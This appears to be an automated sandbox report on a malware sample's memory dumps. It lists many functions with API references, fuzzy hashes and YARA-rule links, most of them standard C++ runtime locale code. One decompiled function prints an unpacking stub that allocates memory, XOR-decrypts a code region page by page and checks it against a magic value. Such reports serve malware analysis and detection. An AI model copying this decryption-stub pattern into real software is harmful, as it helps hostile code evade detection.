Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: c70159e5ec2f33babd9150fd821c0e7f2d33b167ffa20d8ca591aec8bdcf042c
Instruction ID: a3a97e66f936e002aa13df797db6e62a2e294e166136d9327b85320cdf67eea7
Opcode Fuzzy Hash: c70159e5ec2f33babd9150fd821c0e7f2d33b167ffa20d8ca591aec8bdcf042c
Instruction Fuzzy Hash: 0A51E432A00605EFDB10CFA9C840BAA77FAFF54324F144569E409DB290F771E989EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5DB3, Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5DBA
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5DC4
std::_Facet_Register.LIBCPMT ref: 6E1A5E15
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5E35
__EH_prolog3.LIBCMT ref: 6E1A5E4F

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$H_prolog3Lockit$Facet_Lockit::_Lockit::~_Register
String ID:
API String ID: 1100962788-0
Opcode ID: 298fb4d03f77fe973d9bd95ddd0bb7c43a5f697d89b931676f020cc4d2c35f4a
Instruction ID: 705a8d9d3385d03cf6f5811d7e5d329cf8c63b84ceecf7f37a0fd48bac123268
Opcode Fuzzy Hash: 298fb4d03f77fe973d9bd95ddd0bb7c43a5f697d89b931676f020cc4d2c35f4a
Instruction Fuzzy Hash: 3D21A479900259DFCF01DFE8C8106FEBBB9AF84314F144919E925AB280CB719AC5EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1914CD, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1914D4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1914DE
codecvt.LIBCPMT ref: 6E191518
std::_Facet_Register.LIBCPMT ref: 6E19152F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19154F

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 23178f03d8b9bb05921f547dddfc29f4352deafe1cd36aae9508ab025daf2028
Instruction ID: b56ac000eec935405a4d9785693c7d1441b70ddc16c33e0f4b1c40f14b60fd13
Opcode Fuzzy Hash: 23178f03d8b9bb05921f547dddfc29f4352deafe1cd36aae9508ab025daf2028
Instruction Fuzzy Hash: D811E975B001159BCB05DBE8D810AFD777DAF85714F264819E816AB280CF709EC8FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E18FA20, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E18FA27
std::_Lockit::_Lockit.LIBCPMT ref: 6E18FA31
codecvt.LIBCPMT ref: 6E18FA6B
std::_Facet_Register.LIBCPMT ref: 6E18FA82
std::_Lockit::~_Lockit.LIBCPMT ref: 6E18FAA2

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 0654fc3634666218949730838d6ed2d5bcff777e7ee1435541cf0c8bea3019f8
Instruction ID: 1a7c17a4ff95586dd976a022b2b0ec220a555b2cdd9b1fd7ed3e39384983d8bd
Opcode Fuzzy Hash: 0654fc3634666218949730838d6ed2d5bcff777e7ee1435541cf0c8bea3019f8
Instruction Fuzzy Hash: E7110B35A002299BCF05DBD4CC14AEE77BDAF88724F244419F825AB280DF749EC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19361B, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E193622
std::_Lockit::_Lockit.LIBCPMT ref: 6E19362C
numpunct.LIBCPMT ref: 6E193666
std::_Facet_Register.LIBCPMT ref: 6E19367D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19369D

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registernumpunct
String ID:
API String ID: 3875005873-0
Opcode ID: 590b1d01d92ee8ff5d7b6470e241a0ebe6a3c6fb16e3c86fab8b22143bd1302c
Instruction ID: 0028519176401f016a80325fdffecf9521edcbbbd80284b082ae5a5b868edfb4
Opcode Fuzzy Hash: 590b1d01d92ee8ff5d7b6470e241a0ebe6a3c6fb16e3c86fab8b22143bd1302c
Instruction Fuzzy Hash: CC01C435900516CFCB05DBE4C918AED77BABF84314F244819E829AB380CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198E37, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198E3E
std::_Lockit::_Lockit.LIBCPMT ref: 6E198E48
ctype.LIBCPMT ref: 6E198E82
std::_Facet_Register.LIBCPMT ref: 6E198E99
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198EB9

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registerctype
String ID:
API String ID: 2628141667-0
Opcode ID: 1169c89c785eb03ebc291c45d55f276fc1a1e72dcb9234aeb3c7728ea4412134
Instruction ID: 39386851b63e0e6d124aae01dcb901c93bfb69ba2ab5e600cca973946e8a786b
Opcode Fuzzy Hash: 1169c89c785eb03ebc291c45d55f276fc1a1e72dcb9234aeb3c7728ea4412134
Instruction Fuzzy Hash: 1701C439D00619DFCB05DBE4C8206FEB779AF84314F244809E811AB290CF349AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19965D, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199664
std::_Lockit::_Lockit.LIBCPMT ref: 6E19966E
numpunct.LIBCPMT ref: 6E1996A8
std::_Facet_Register.LIBCPMT ref: 6E1996BF
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1996DF

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registernumpunct
String ID:
API String ID: 3875005873-0
Opcode ID: 2fdfff416599800db40594f42115fd4a91c6b38c83441c6c6a68ddd657012e5b
Instruction ID: 245922cce948cd74e94cef248f2f37043561a4d65e63d741d66994c31787f0b7
Opcode Fuzzy Hash: 2fdfff416599800db40594f42115fd4a91c6b38c83441c6c6a68ddd657012e5b
Instruction Fuzzy Hash: 6E01D6759001198FCF05DBE4C864AFE77B9AF84314F240809E821AB290CF359AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198ECC, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198ED3
std::_Lockit::_Lockit.LIBCPMT ref: 6E198EDD
messages.LIBCPMT ref: 6E198F17
std::_Facet_Register.LIBCPMT ref: 6E198F2E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198F4E

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermessages
String ID:
API String ID: 1766764229-0
Opcode ID: e21d6fa7952e304f427934070741eae47f3d3f88944e7e9dae6eb58e8339e977
Instruction ID: 5e076aeb189553285414570725fcfbe19b921862a8ee4b366de0af7591399d3a
Opcode Fuzzy Hash: e21d6fa7952e304f427934070741eae47f3d3f88944e7e9dae6eb58e8339e977
Instruction Fuzzy Hash: AC01C4359005199BCF05DBE4C814AFE77BABF84354F244809E825AB280CF749AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E198F61, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198F68
std::_Lockit::_Lockit.LIBCPMT ref: 6E198F72
messages.LIBCPMT ref: 6E198FAC
std::_Facet_Register.LIBCPMT ref: 6E198FC3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198FE3

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermessages
String ID:
API String ID: 1766764229-0
Opcode ID: 57283259d4671350a834fe4a64abb74f2088c595764d0295a08d5d6026d2c1db
Instruction ID: 7df3ae128c0745ee1e005bdc67847355afb9dde7f10253f6837f3f8b7440b8fe
Opcode Fuzzy Hash: 57283259d4671350a834fe4a64abb74f2088c595764d0295a08d5d6026d2c1db
Instruction Fuzzy Hash: 2A01C4359005169FCB05DBE4C814AFE777A7F94754F240809E811AB2C0DF3099C8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199409, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199410
std::_Lockit::_Lockit.LIBCPMT ref: 6E19941A
moneypunct.LIBCPMT ref: 6E199454
std::_Facet_Register.LIBCPMT ref: 6E19946B
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19948B

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: c903effef4c72db7254d461b9342eeac79ed2d5cbf2649f432b4799139f5b443
Instruction ID: 7642f4a12d3c785234d10d811e9be50fb0a5542de51db2306e885ad6f1c017d7
Opcode Fuzzy Hash: c903effef4c72db7254d461b9342eeac79ed2d5cbf2649f432b4799139f5b443
Instruction Fuzzy Hash: 3C01D67590011ACFCB06DBE4C924AFD777A6F94314F244909E821AB380CF309AC4FB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E198C78, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198C7F
std::_Lockit::_Lockit.LIBCPMT ref: 6E198C89
codecvt.LIBCPMT ref: 6E198CC3
std::_Facet_Register.LIBCPMT ref: 6E198CDA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198CFA

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercodecvt
String ID:
API String ID: 738035616-0
Opcode ID: 2561eee440b68459346c707a01c16628b4a5ee0cd62a98b15f585fffae40ee5a
Instruction ID: 394e12805d4733e4918c964a3baea71fa44e8d2b4192e725d344a79ec5cb6fa7
Opcode Fuzzy Hash: 2561eee440b68459346c707a01c16628b4a5ee0cd62a98b15f585fffae40ee5a
Instruction Fuzzy Hash: 1001D63590051ADFCF05DBE4D814AFD7779AF84314F244809E821AB280CF7099C5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5C89, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5C90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C9A
moneypunct.LIBCPMT ref: 6E1A5CD4
std::_Facet_Register.LIBCPMT ref: 6E1A5CEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5D0B

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 58139f290fcc45dffee042b5814e0830010c9a94adb72ba2d21829d79658ac9b
Instruction ID: 943a61ba7dc438d287af88a0061a145d8f19d911c79bc52c60fe55c4d2a9d107
Opcode Fuzzy Hash: 58139f290fcc45dffee042b5814e0830010c9a94adb72ba2d21829d79658ac9b
Instruction Fuzzy Hash: 9A01D6399006199FCF05DBE8C814AFD77B9AF84314F244809E921BB280CF3099C4EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198D0D, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198D14
std::_Lockit::_Lockit.LIBCPMT ref: 6E198D1E
collate.LIBCPMT ref: 6E198D58
std::_Facet_Register.LIBCPMT ref: 6E198D6F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198D8F

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercollate
String ID:
API String ID: 1032263157-0
Opcode ID: 599bf965f27ae60ef5f092832ee5a078307f8c3647e12e63b69e7eb29cb7be72
Instruction ID: fc9f8dec7159ce59476065ed2a94e9b6416dca88f47aba3c0eb6a2ac7f9ac253
Opcode Fuzzy Hash: 599bf965f27ae60ef5f092832ee5a078307f8c3647e12e63b69e7eb29cb7be72
Instruction Fuzzy Hash: 0701D635900219DFCF05DBE4C8546FE77B9AF94714F244809E815AB290CF309AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E198DA2, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E198DA9
std::_Lockit::_Lockit.LIBCPMT ref: 6E198DB3
collate.LIBCPMT ref: 6E198DED
std::_Facet_Register.LIBCPMT ref: 6E198E04
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198E24

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registercollate
String ID:
API String ID: 1032263157-0
Opcode ID: 0cbddcdb7313549b97ae46eca3e79eb8b31378fcc8f41ed159bcc800b456f399
Instruction ID: b9c5f9ff80df82dcf86efd7d197706c31ee95018ebd097e7722d357b9bc2875e
Opcode Fuzzy Hash: 0cbddcdb7313549b97ae46eca3e79eb8b31378fcc8f41ed159bcc800b456f399
Instruction Fuzzy Hash: 1901C4359001198FCF05DBE4C864AFEB77AAF84314F244909E811AB280CF309EC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5A35, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5A3C
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5A46
messages.LIBCPMT ref: 6E1A5A80
std::_Facet_Register.LIBCPMT ref: 6E1A5A97
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5AB7

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermessages
String ID:
API String ID: 1766764229-0
Opcode ID: 22bc93af3f81e5cf4c30ce545e235092cb173b2b749f30845403a5d5b2760a41
Instruction ID: 3d9988620228243624e55f100f26299a3667a51914be62b074eaf32b7dc1640a
Opcode Fuzzy Hash: 22bc93af3f81e5cf4c30ce545e235092cb173b2b749f30845403a5d5b2760a41
Instruction Fuzzy Hash: FA01C439A00519DFCF05DBE8C8506FE777AAF84314F254809E911AB280CF309DC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19924A, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199251
std::_Lockit::_Lockit.LIBCPMT ref: 6E19925B
moneypunct.LIBCPMT ref: 6E199295
std::_Facet_Register.LIBCPMT ref: 6E1992AC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1992CC

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: d7bdb2aa0651d0913fc6dae525a68ba55dde589d35c572c1fdd28524f310ab95
Instruction ID: 362467e3f6c30ec5c52ba7210d1a02f663c517a444eae956154af8f8e17132a0
Opcode Fuzzy Hash: d7bdb2aa0651d0913fc6dae525a68ba55dde589d35c572c1fdd28524f310ab95
Instruction Fuzzy Hash: 0B01C4799005199FCB05DBE4C8246FD7779AF84314F240809E811AB280DF309AC8BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1992DF, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1992E6
std::_Lockit::_Lockit.LIBCPMT ref: 6E1992F0
moneypunct.LIBCPMT ref: 6E19932A
std::_Facet_Register.LIBCPMT ref: 6E199341
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199361

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 31b80db62e3a1e49051d40e1ed313247f10c907261c9f1c604848f74c3151aaf
Instruction ID: d788cbee4a1e63204e9d811192541543f6225f3b3f0145b497824c6980705d36
Opcode Fuzzy Hash: 31b80db62e3a1e49051d40e1ed313247f10c907261c9f1c604848f74c3151aaf
Instruction Fuzzy Hash: E301C4359001199FCF05DBE8C8246FE77B9AF94714F244809E815AB2C0CF719AC9FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199374, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19937B
std::_Lockit::_Lockit.LIBCPMT ref: 6E199385
moneypunct.LIBCPMT ref: 6E1993BF
std::_Facet_Register.LIBCPMT ref: 6E1993D6
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1993F6

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 72e6b4df81fca651240c19878939cc4004f9fee940a1570338233f44f8c2fc89
Instruction ID: 9d285fafeaac1ba0abaa64e43ddfcc3a5e286b63f1931e2a9ed5d2d762bcf19d
Opcode Fuzzy Hash: 72e6b4df81fca651240c19878939cc4004f9fee940a1570338233f44f8c2fc89
Instruction Fuzzy Hash: 8301C4359006158FCB05DBE8D8646FE7779BF84354F244909E811AB2C0CF309AC5FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5BF4, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A5BFB
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5C05
moneypunct.LIBCPMT ref: 6E1A5C3F
std::_Facet_Register.LIBCPMT ref: 6E1A5C56
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5C76

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Registermoneypunct
String ID:
API String ID: 3502174300-0
Opcode ID: 224c859db73a9e7990504f3a788f239645654250f3c118f8d2cccf15b826371b
Instruction ID: 82fc6aaa63711f39969082ff4d791366afad50befdd7dc3878c9ab6c5f535116
Opcode Fuzzy Hash: 224c859db73a9e7990504f3a788f239645654250f3c118f8d2cccf15b826371b
Instruction Fuzzy Hash: A601C4399046199FCF05DBE8D9146FD777DAF84714F644809E911AB2C4CF309AC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDD12, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DDD2A

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1C1383,?,?,?,6E1AADF4,?,?,?,6E17CEF2,000000FF,?,?,?,6E1E9B2C), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DDD3C
_free.LIBCMT ref: 6E1DDD4E
_free.LIBCMT ref: 6E1DDD60
_free.LIBCMT ref: 6E1DDD72

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8cdf278fa9146b08bb84b77cb0327afae93c9551589190da8098d6a27d5bb4bc
Instruction ID: 9496aee8cb1fd4ab3e44c68319b0141d2c9896f2e2630b6e60353b4c28a19e52
Opcode Fuzzy Hash: 8cdf278fa9146b08bb84b77cb0327afae93c9551589190da8098d6a27d5bb4bc
Instruction Fuzzy Hash: 2BF06232608E099B8E54CAE4E4C5DDA33EEBA113103750D0AF158D7940DB30F9C8DEA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F3D8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E19F3DF

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981D0
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981ED
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E19820A

_Mpunct.LIBCPMT ref: 6E19F46C
_Mpunct.LIBCPMT ref: 6E19F486

Strings

$+xv, xrefs: 6E19F491

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Maklocstr$Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 1929215243-1686923651
Opcode ID: f3e08906d9f5a333d795c6ddfb7f102dbab762792644383e79e2091ef75bf78a
Instruction ID: 7762cba599378717141c81ca1288b07ae151f9c16d7a46fefb227b686c7ecf9e
Opcode Fuzzy Hash: f3e08906d9f5a333d795c6ddfb7f102dbab762792644383e79e2091ef75bf78a
Instruction Fuzzy Hash: 1121B5B1504B526ED721CFB584907BBBEFCAB0C604B14491AE499C7E41D734DA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7184, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1A718B

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Mpunct.LIBCPMT ref: 6E1A7218
_Mpunct.LIBCPMT ref: 6E1A7232

Strings

$+xv, xrefs: 6E1A723D

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 23384044-1686923651
Opcode ID: aa9e649425a58c0a57a4fe74cd2f5f2430b8336f843c83e7f2e0670f388d84b1
Instruction ID: ab0e2211fa93b92030320733f6efe4bec671a74c67537443082e05e77e046dd2
Opcode Fuzzy Hash: aa9e649425a58c0a57a4fe74cd2f5f2430b8336f843c83e7f2e0670f388d84b1
Instruction Fuzzy Hash: 342195B5904B926ED721CFB888507BBBEFCBB09614F04091EE599C7A41D734DA81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1618F4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1618F4(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6e164130;
				_t39 = E6E161F5D(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6e16414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6e1651a7; // 0x6e1651a7
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6E1618C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6e16414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000);
					}
				}
				return _v16;
			}

0x6e1618fb
0x6e16190b
0x6e161912
0x6e161915
0x6e16192a
0x6e161931
0x6e161936
0x6e161947
0x6e16194a
0x6e161952
0x6e161955
0x6e1619ff
0x6e16195b
0x6e16195b
0x6e16195f
0x6e1619c7
0x6e161961
0x6e161961
0x6e161964
0x6e161966
0x6e16196e
0x6e161971
0x6e161974
0x6e16197c
0x6e161984
0x6e161985
0x6e161986
0x6e16198d
0x6e16198d
0x6e1619a1
0x6e1619a6
0x6e1619af
0x6e1619b6
0x6e1619b9
0x6e1619bd
0x6e1619c2
0x00000000
0x00000000
0x6e161979
0x6e161979
0x6e1619c4
0x6e1619d1
0x6e1619e6
0x6e1619d3
0x6e1619dc
0x6e1619e1
0x6e1619f7
0x6e1619f7
0x6e161a06
0x6e161a0c

APIs

VirtualAlloc.KERNEL32(00000000,6E16167D,00003000,00000004,?,?,6E16167D,00000000), ref: 6E16194A
memcpy.NTDLL(?,?,6E16167D,?,?,6E16167D,00000000), ref: 6E1619DC
VirtualFree.KERNEL32(?,00000000,00008000,?,?,6E16167D,00000000), ref: 6E1619F7

Strings

Mar 9 2021, xrefs: 6E16197C

Memory Dump Source

Source File: 00000003.00000002.510520660.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.510245175.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511124947.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.511621519.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.511659655.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 9 2021
API String ID: 4010158826-2159264323
Opcode ID: 26b68c8339297d9a2adff27b84c0e05aece165c858a211e78fbea5d70f074c14
Instruction ID: 267cd5e4a300fb3f3d2e9d20317fd6f4d00943e60fe420ae920737fc0fbadb25
Opcode Fuzzy Hash: 26b68c8339297d9a2adff27b84c0e05aece165c858a211e78fbea5d70f074c14
Instruction Fuzzy Hash: 39316171E001199FDF01CFD9C880AEEBBB9BF49308F108169E909B7244D771AA5ADB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F56E, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6E19F575
_Maklocstr.LIBCPMT ref: 6E19F5DE
_Maklocstr.LIBCPMT ref: 6E19F5F0
_Getvals.LIBCPMT ref: 6E19F63A

Memory Dump Source

Source File: 00000003.00000002.511716383.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Maklocstr$GetvalsH_prolog3_
String ID:
API String ID: 1611767717-0
Opcode ID: 129d6dbe499302fbca377b4abd9b2fee7682162ce2771b5afd434ce34f488d88
Instruction ID: 47f7dcdf1c6d2c9f557ca67a5ae65031e22c6c65bbda4d0e5ee8ecdab874262a
Opcode Fuzzy Hash: 129d6dbe499302fbca377b4abd9b2fee7682162ce2771b5afd434ce34f488d88
